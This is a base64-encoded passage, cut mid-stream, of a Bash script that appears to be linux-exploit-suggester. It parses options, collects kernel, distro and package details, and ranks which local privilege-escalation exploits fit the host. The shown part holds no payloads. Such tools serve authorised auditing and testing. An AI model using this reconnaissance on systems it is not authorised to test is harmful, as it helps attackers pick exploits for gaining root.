25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgICAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLXBrZy12ZXJzaW9ucykKICAgICAgICAgICAgb3B0X3NraXBfcGtnX3ZlcnNpb25zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAqKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBpZiBbICIkIyIgIT0gIjAiIF07IHRoZW4KICAgICAgICAgICAgICAgIGV4aXRXaXRoRXJyTXNnICJVbmtub3duIG9wdGlvbiAnJDEnLiBBYm9ydGluZy4iCiAgICAgICAgICAgIGZpCiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIDs7CiAgICBlc2FjCiAgICBzaGlmdApkb25lCgojIGNoZWNrIEJhc2ggdmVyc2lvbiAoYXNzb2NpYXRpdmUgYXJyYXlzIG5lZWQgQmFzaCBpbiB2ZXJzaW9uIDQuMCspCmlmICgoQkFTSF9WRVJTSU5GT1swXSA8IDQpKTsgdGhlbgogICAgZXhpdFdpdGhFcnJNc2cgIlNjcmlwdCBuZWVkcyBCYXNoIGluIHZlcnNpb24gNC4wIG9yIG5ld2VyLiBBYm9ydGluZy4iCmZpCgojIGV4aXQgaWYgYm90aCAtLWtlcm5lbCBhbmQgLS11bmFtZSBhcmUgc2V0ClsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgWyAkb3B0X3VuYW1lX3N0cmluZyA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAta3wtLWtlcm5lbCBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCgojIGV4aXQgaWYgYm90aCAtLWZ1bGwgYW5kIC0tc2hvcnQgYXJlIHNldApbICIkb3B0X2Z1bGwiID0gInRydWUiIF0gJiYgWyAkb3B0X3N1bW1hcnkgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWZ8LS1mdWxsIGFuZCAtZ3wtLXNob3J0IGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgLS1jdmVsaXN0LWZpbGUgbW9kZSBpcyBzdGFuZGFsb25lIG1vZGUgYW5kIGlzIG5vdCBhcHBsaWNhYmxlIHdoZW4gb25lIG9mIC1rIHwgLXUgfCAtcCB8IC0tY2hlY2tzZWMgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAhIC1lICIkQ1ZFTElTVF9GSUxFIiBdICYmIGV4aXRXaXRoRXJyTXNnICJQcm92aWRlZCBDVkUgbGlzdCBmaWxlIGRvZXMgbm90IGV4aXN0cy4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWN2ZWxpc3QtZmlsZSBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLXB8LS1wa2dsaXN0LWZpbGUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgLS1jaGVja3NlYyBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jdmVsaXN0LWZpbGUgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2NoZWNrc2VjX21vZGUiID0gInRydWUiIF07IHRoZW4KICAgIFsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1rfC0ta2VybmVsIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jaGVja3NlYyBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCmZpCgojIGV4dHJhY3Qga2VybmVsIHZlcnNpb24gYW5kIG90aGVyIE9TIGluZm8gbGlrZSBkaXN0cm8gbmFtZSwgZGlzdHJvIHZlcnNpb24sIGV0Yy4gMyBwb3NzaWJpbGl0aWVzIGhlcmU6CiMgY2FzZSAxOiAtLWtlcm5lbCBzZXQKaWYgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPT0gInRydWUiIF07IHRoZW4KICAgICMgVE9ETzogYWRkIGtlcm5lbCB2ZXJzaW9uIG51bWJlciB2YWxpZGF0aW9uCiAgICBbIC16ICIkS0VSTkVMIiBdICYmIGV4aXRXaXRoRXJyTXNnICJVbnJlY29nbml6ZWQga2VybmVsIHZlcnNpb24gZ2l2ZW4uIEFib3J0aW5nLiIKICAgIEFSQ0g9IiIKICAgIE9TPSIiCgogICAgIyBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyBvbiBjdXJyZW50IG1hY2hpbmUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKCiAgICAjIGRvIG5vdCBjb25zaWRlciBjdXJyZW50IE9TCiAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKIyBjYXNlIDI6IC0tdW5hbWUgc2V0CmVsaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiBdOyB0aGVuCiAgICBbIC16ICIkVU5BTUVfQSIgXSAmJiBleGl0V2l0aEVyck1zZyAidW5hbWUgc3RyaW5nIGVtcHR5LiBBYm9ydGluZy4iCiAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMzogLS1jdmVsaXN0LWZpbGUgbW9kZQplbGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKIyBjYXNlIDQ6IC0tY2hlY2tzZWMgbW9kZQplbGlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICMgdGhpcyBzd2l0Y2ggaXMgbm90IGFwcGxpY2FibGUgaW4gdGhpcyBtb2RlCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz1mYWxzZQoKICAgICMgZ2V0IGtlcm5lbCBjb25maWd1cmF0aW9uIGluIHRoaXMgbW9kZQogICAgZ2V0S2VybmVsQ29uZmlnCiAgICBbIC16ICIkS0NPTkZJRyIgXSAmJiBlY2hvICJXQVJOSU5HLiBLZXJuZWwgQ29uZmlnIG5vdCBmb3VuZCBvbiB0aGUgc3lzdGVtIHJlc3VsdHMgd29uJ3QgYmUgY29tcGxldGUuIgoKICAgICMgbGF1bmNoIGNoZWNrc2VjIG1vZGUKICAgIGNoZWNrc2VjTW9kZQoKICAgIGV4aXQgMAoKIyBjYXNlIDU6IG5vIC0tdW5hbWUgfCAtLWtlcm5lbCB8IC0tY3ZlbGlzdC1maWxlIHwgLS1jaGVja3NlYyBzZXQKZWxzZQoKICAgICMgLS1wa2dsaXN0LWZpbGUgTk9UIHByb3ZpZGVkOiB0YWtlIGFsbCBpbmZvIGZyb20gY3VycmVudCBtYWNoaW5lCiAgICAjIGNhc2UgZm9yIHZhbmlsbGEgZXhlY3V0aW9uOiAuL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoCiAgICBpZiBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPT0gImZhbHNlIiBdOyB0aGVuCiAgICAgICAgVU5BTUVfQT0kKHVuYW1lIC1hKQogICAgICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgICAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAgICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJmYWxzZSIgXSAmJiBnZXRLZXJuZWxDb25maWcKCiAgICAgICAgIyBleHRyYWN0IGRpc3RyaWJ1dGlvbiB2ZXJzaW9uIGZyb20gL2V0Yy9vcy1yZWxlYXNlIE9SIC9ldGMvbHNiLXJlbGVhc2UKICAgICAgICBbIC1uICIkT1MiIC1hICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIERJU1RSTz0kKGdyZXAgLXMgLUUgJ15ESVNUUklCX1JFTEVBU0U9fF5WRVJTSU9OX0lEPScgL2V0Yy8qLXJlbGVhc2UgfCBjdXQgLWQnPScgLWYyIHwgaGVhZCAtMSB8IHRyIC1kICciJykKCiAgICAgICAgIyBleHRyYWN0IHBhY2thZ2UgbGlzdGluZyBmcm9tIGN1cnJlbnQgT1MKICAgICAgICBnZXRQa2dMaXN0ICIkT1MiICIiCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBwcm92aWRlZDogb25seSBjb25zaWRlciB1c2Vyc3BhY2UgZXhwbG9pdHMgYWdhaW5zdCBwcm92aWRlZCBwYWNrYWdlIGxpc3RpbmcKICAgIGVsc2UKICAgICAgICBLRVJORUw9IiIKICAgICAgICAjVE9ETzogZXh0cmFjdCBtYWNoaW5lIGFyY2ggZnJvbSBwYWNrYWdlIGxpc3RpbmcKICAgICAgICBBUkNIPSIiCiAgICAgICAgdW5zZXQgRVhQTE9JVFMKICAgICAgICBkZWNsYXJlIC1BIEVYUExPSVRTCiAgICAgICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiAgICAgICAgIyBhZGRpdGlvbmFsIGNoZWNrcyBhcmUgbm90IGFwcGxpY2FibGUgZm9yIHRoaXMgbW9kZQogICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgIGZpCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fUF2YWlsYWJsZSBpbmZvcm1hdGlvbjoke3R4dHJzdH0iCmVjaG8KWyAtbiAiJEtFUk5FTCIgXSAmJiBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRncm59JEtFUk5FTCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiS2VybmVsIHZlcnNpb246ICR7dHh0cmVkfU4vQSR7dHh0cnN0fSIKZWNobyAiQXJjaGl0ZWN0dXJlOiAkKFsgLW4gIiRBUkNIIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRBUkNIJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKZWNobyAiRGlzdHJpYnV0aW9uOiAkKFsgLW4gIiRPUyIgXSAmJiBlY2hvIC1lICIke3R4dGdybn0kT1Mke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvIC1lICJEaXN0cmlidXRpb24gdmVyc2lvbjogJChbIC1uICIkRElTVFJPIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRESVNUUk8ke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKZWNobyAiQWRkaXRpb25hbCBjaGVja3MgKENPTkZJR18qLCBzeXNjdGwgZW50cmllcywgY3VzdG9tIEJhc2ggY29tbWFuZHMpOiAkKFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPT0gImZhbHNlIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufXBlcmZvcm1lZCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgppZiBbIC1uICIkUEtHTElTVF9GSUxFIiAtYSAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59JFBLR0xJU1RfRklMRSR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHTElTVF9GSUxFIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRyZWR9dW5yZWNvZ25pemVkIGZpbGUgcHJvdmlkZWQke3R4dHJzdH0iCmVsaWYgWyAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59ZnJvbSBjdXJyZW50IE9TJHt0eHRyc3R9IgpmaQoKZWNobyAtZSAiUGFja2FnZSBsaXN0aW5nOiAkKFsgLW4gIiRwa2dMaXN0RmlsZSIgXSAmJiBlY2hvIC1lICIkcGtnTGlzdEZpbGUiIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKIyBoYW5kbGUgLS1rZXJuZWxzcGFjeS1vbmx5ICYgLS11c2Vyc3BhY2Utb25seSBmaWx0ZXIgb3B0aW9ucwppZiBbICIkb3B0X2tlcm5lbF9vbmx5IiA9ICJ0cnVlIiAtbyAteiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUU19VU0VSU1BBQ0UKICAgIGRlY2xhcmUgLUEgRVhQTE9JVFNfVVNFUlNQQUNFCmZpCgppZiBbICIkb3B0X3VzZXJzcGFjZV9vbmx5IiA9ICJ0cnVlIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUUwogICAgZGVjbGFyZSAtQSBFWFBMT0lUUwpmaQoKZWNobwplY2hvIC1lICIke2JsZHdodH1TZWFyY2hpbmcgYW1vbmc6JHt0eHRyc3R9IgplY2hvCmVjaG8gIiR7I0VYUExPSVRTW0BdfSBrZXJuZWwgc3BhY2UgZXhwbG9pdHMiCmVjaG8gIiR7I0VYUExPSVRTX1VTRVJTUEFDRVtAXX0gdXNlciBzcGFjZSBleHBsb2l0cyIKZWNobwoKZWNobyAtZSAiJHtibGR3aHR9UG9zc2libGUgRXhwbG9pdHM6JHt0eHRyc3R9IgplY2hvCgojIHN0YXJ0IGFuYWx5c2lzCmo9MApmb3IgRVhQIGluICIke0VYUExPSVRTW0BdfSIgIiR7RVhQTE9JVFNfVVNFUlNQQUNFW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIFRBR1M9IiR7VEFHUzo2fSIKICAgIFJBTks9IiR7YXJyWzNdfSIgJiYgUkFOSz0iJHtSQU5LOjZ9IgoKICAgICMgc3BsaXQgbGluZSB3aXRoIHJlcXVpcmVtZW50cyAmIGxvb3AgdGhydSBhbGwgcmVxcyBvbmUgYnkgb25lICYgY2hlY2sgd2hldGhlciBpdCBpcyBtZXQKICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRSRVFTIgogICAgUkVRU19OVU09JHsjYXJyYXlbQF19CiAgICBQQVNTRURfUkVRPTAKICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIgIiR7YXJyYXlbMF19Iik7IHRoZW4KICAgICAgICAgICAgUEFTU0VEX1JFUT0kKCgkUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgZXhlY3V0ZSBmb3IgZXhwbG9pdHMgd2l0aCBhbGwgcmVxdWlyZW1lbnRzIG1ldAogICAgaWYgWyAkUEFTU0VEX1JFUSAtZXEgJFJFUVNfTlVNIF07IHRoZW4KCiAgICAgICAgIyBhZGRpdGlvbmFsIHJlcXVpcmVtZW50IGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlOiBjaGVjayBpZiBDVkUgYXNzb2NpYXRlZCB3aXRoIHRoZSBleHBsb2l0IGlzIG9uIHRoZSBDVkVMSVNUX0ZJTEUKICAgICAgICBpZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICAgICAgICAgIyBleHRyYWN0IENWRShzKSBhc3NvY2lhdGVkIHdpdGggZ2l2ZW4gZXhwbG9pdCAoYWxzbyB0cmFuc2xhdGVzICcsJyB0byAnfCcgZm9yIGVhc3kgaGFuZGxpbmcgbXVsdGlwbGUgQ1ZFcyBjYXNlIC0gdmlhIGV4dGVuZGVkIHJlZ2V4KQogICAgICAgICAgICBjdmU9JChlY2hvICIkTkFNRSIgfCBncmVwICcuKlxbLipcXS4qJyB8IGN1dCAtZCAnbScgLWYyIHwgY3V0IC1kICddJyAtZjEgfCB0ciAtZCAnWycgfCB0ciAiLCIgInwiKQogICAgICAgICAgICAjZWNobyAiQ1ZFOiAkY3ZlIgoKICAgICAgICAgICAgIyBjaGVjayBpZiBpdCdzIG9uIENWRUxJU1RfRklMRSBsaXN0LCBpZiBubyBtb3ZlIHRvIG5leHQgZXhwbG9pdAogICAgICAgICAgICBbICEgJChjYXQgIiRDVkVMSVNUX0ZJTEUiIHwgZ3JlcCAtRSAiJGN2ZSIpIF0gJiYgY29udGludWUKICAgICAgICBmaQoKICAgICAgICAjIHByb2Nlc3MgdGFncyBhbmQgaGlnaGxpZ2h0IHRob3NlIHRoYXQgbWF0Y2ggY3VycmVudCBPUyAob25seSBmb3IgZGVifHVidW50dXxSSEVMIGFuZCBpZiB3ZSBrbm93IGRpc3RybyB2ZXJzaW9uIC0gZGlyZWN0IG1vZGUpCiAgICAgICAgdGFncz0iIgogICAgICAgIGlmIFsgLW4gIiRUQUdTIiAtYSAtbiAiJE9TIiBdOyB0aGVuCiAgICAgICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSB0YWdzX2FycmF5IDw8PCAiJFRBR1MiCiAgICAgICAgICAgIFRBR1NfTlVNPSR7I3RhZ3NfYXJyYXlbQF19CgogICAgICAgICAgICAjIGJ1bXAgUkFOSyBzbGlnaHRseSAoKzEpIGlmIHdlJ3JlIGluICctLXVuYW1lJyBtb2RlIGFuZCB0aGVyZSdzIGEgVEFHIGZvciBPUyBmcm9tIHVuYW1lIHN0cmluZwogICAgICAgICAgICBbICIkKGVjaG8gIiR7dGFnc19hcnJheVtAXX0iIHwgZ3JlcCAiJE9TIikiIC1hICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDEpKQoKICAgICAgICAgICAgZm9yIFRBRyBpbiAiJHt0YWdzX2FycmF5W0BdfSI7IGRvCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYxKQogICAgICAgICAgICAgICAgdGFnX2Rpc3Ryb19udW1fYWxsPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYyKQogICAgICAgICAgICAgICAgIyBpbiBjYXNlIG9mIHRhZyBvZiBmb3JtOiAndWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMX0gcmVtb3ZlIGtlcm5lbCB2ZXJzaW9uaW5nIHBhcnQgZm9yIGNvbXBhcmlzaW9uCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bT0iJHt0YWdfZGlzdHJvX251bV9hbGwleyp9IgoKICAgICAgICAgICAgICAgICMgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgT1IgKGZvciBub3JtYWwgbW9kZSkgaWYgdGhlcmUgaXMgZGlzdHJvIHZlcnNpb24gbWF0Y2gKICAgICAgICAgICAgICAgIGlmIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgLW8gXCggIiRPUyIgPT0gIiR0YWdfZGlzdHJvIiAtYSAiJChlY2hvICIkRElTVFJPIiB8IGdyZXAgLUUgIiR0YWdfZGlzdHJvX251bSIpIiBcKSBdOyB0aGVuCgogICAgICAgICAgICAgICAgICAgICMgYnVtcCBjdXJyZW50IGV4cGxvaXQncyByYW5rIGJ5IDIgZm9yIGRpc3RybyBtYXRjaCAoYW5kIG5vdCBpbiAnLS11bmFtZScgbW9kZSkKICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFJBTks9JCgoJFJBTksgKyAyKSkKCiAgICAgICAgICAgICAgICAgICAgIyBnZXQgbmFtZSAoa2VybmVsIG9yIHBhY2thZ2UgbmFtZSkgYW5kIHZlcnNpb24gb2Yga2VybmVsL3BrZyBpZiBwcm92aWRlZDoKICAgICAgICAgICAgICAgICAgICB0YWdfcGtnPSQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBjdXQgLWQneycgLWYgMiB8IHRyIC1kICd9JyB8IGN1dCAtZCc6JyAtZiAxKQogICAgICAgICAgICAgICAgICAgIHRhZ19wa2dfbnVtPSIiCiAgICAgICAgICAgICAgICAgICAgWyAkKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgZ3JlcCAneycpIF0gJiYgdGFnX3BrZ19udW09JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDIpCgogICAgICAgICAgICAgICAgICAgICNbIC1uICIkdGFnX3BrZ19udW0iIF0gJiYgZWNobyAidGFnX3BrZ19udW06ICR0YWdfcGtnX251bTsga2VybmVsOiAkS0VSTkVMX0FMTCIKCiAgICAgICAgICAgICAgICAgICAgIyBpZiBwa2cva2VybmVsIHZlcnNpb24gaXMgbm90IHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIGlmIFsgLXogIiR0YWdfcGtnX251bSIgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFRBRz0iJHtsaWdodHllbGxvd31bICR7VEFHfSBdJHt0eHRyc3R9IgoKICAgICAgICAgICAgICAgICAgICAjIGtlcm5lbCB2ZXJzaW9uIHByb3ZpZGVkLCBjaGVjayBmb3IgbWF0Y2g6CiAgICAgICAgICAgICAgICAgICAgZWxpZiBbIC1uICIkdGFnX3BrZ19udW0iIC1hICIkdGFnX3BrZyIgPSAia2VybmVsIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIFsgJChlY2hvICIkS0VSTkVMX0FMTCIgfCBncmVwIC1FICIke3RhZ19wa2dfbnVtfSIpIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gbWF0Y2hlZCAtIGJvbGQgaGlnaGxpZ2h0CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYWRkaXRpb25hbGx5IGJ5IDMgZm9yIGtlcm5lbCB2ZXJzaW9uIHJlZ2V4IG1hdGNoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSQU5LPSQoKCRSQU5LICsgMykpCiAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHRhZ19kaXN0cm89JHRhZ19kaXN0cm9fbnVtIF0ke3R4dHJzdH17a2VybmVsOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgICAgICMgcGtnIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaCAoVEJEKToKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgLW4gIiR0YWdfcGtnIiAgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXskdGFnX3BrZzokdGFnX3BrZ19udW19IgogICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAjIGFwcGVuZCBjdXJyZW50IHRhZyB0byB0YWdzIGxpc3QKICAgICAgICAgICAgICAgIHRhZ3M9IiR7dGFnc30ke1RBR30sIgogICAgICAgICAgICBkb25lCiAgICAgICAgICAgICMgdHJpbSAnLCcgYWRkZWQgYnkgYWJvdmUgbG9vcAogICAgICAgICAgICBbIC1uICIkdGFncyIgXSAmJiB0YWdzPSIke3RhZ3MlP30iCiAgICAgICAgZWxzZQogICAgICAgICAgICB0YWdzPSIkVEFHUyIKICAgICAgICBmaQoKICAgICAgICAjIGluc2VydCB0aGUgbWF0Y2hlZCBleHBsb2l0ICh3aXRoIGNhbGN1bGF0ZWQgUmFuayBhbmQgaGlnaGxpZ2h0ZWQgdGFncykgdG8gYXJyYXJ5IHRoYXQgd2lsbCBiZSBzb3J0ZWQKICAgICAgICBFWFA9JChlY2hvICIkRVhQIiB8IHNlZCAtZSAnL15OYW1lOi9kJyAtZSAnL15SZXFzOi9kJyAtZSAnL15UYWdzOi9kJykKICAgICAgICBleHBsb2l0c190b19zb3J0W2pdPSIke1JBTkt9TmFtZTogJHtOQU1FfUQzTDFtUmVxczogJHtSRVFTfUQzTDFtVGFnczogJHt0YWdzfUQzTDFtJChlY2hvICIkRVhQIiB8IHNlZCAtZSAnOmEnIC1lICdOJyAtZSAnJCFiYScgLWUgJ3MvXG4vRDNMMW0vZycpIgogICAgICAgICgoaisrKSkKICAgIGZpCmRvbmUKCiMgc29ydCBleHBsb2l0cyBiYXNlZCBvbiBjYWxjdWxhdGVkIFJhbmsKSUZTPSQnXG4nClNPUlRFRF9FWFBMT0lUUz0oJChzb3J0IC1yIDw8PCIke2V4cGxvaXRzX3RvX3NvcnRbKl19IikpCnVuc2V0IElGUwoKIyBkaXNwbGF5IHNvcnRlZCBleHBsb2l0cwpmb3IgRVhQX1RFTVAgaW4gIiR7U09SVEVEX0VYUExPSVRTW0BdfSI7IGRvCgoJUkFOSz0kKGVjaG8gIiRFWFBfVEVNUCIgfCBhd2sgLUYnTmFtZTonICd7cHJpbnQgJDF9JykKCgkjIGNvbnZlcnQgZW50cnkgYmFjayB0byBjYW5vbmljYWwgZm9ybQoJRVhQPSQoZWNobyAiJEVYUF9URU1QIiB8IHNlZCAncy9eWzAtOV0vL2cnIHwgc2VkICdzL0QzTDFtL1xuL2cnKQoKCSMgY3JlYXRlIGFycmF5IGZyb20gY3VycmVudCBleHBsb2l0IGhlcmUgZG9jIGFuZCBmZXRjaCBuZWVkZWQgbGluZXMKICAgIGk9MAogICAgIyAoJy1yJyBpcyB1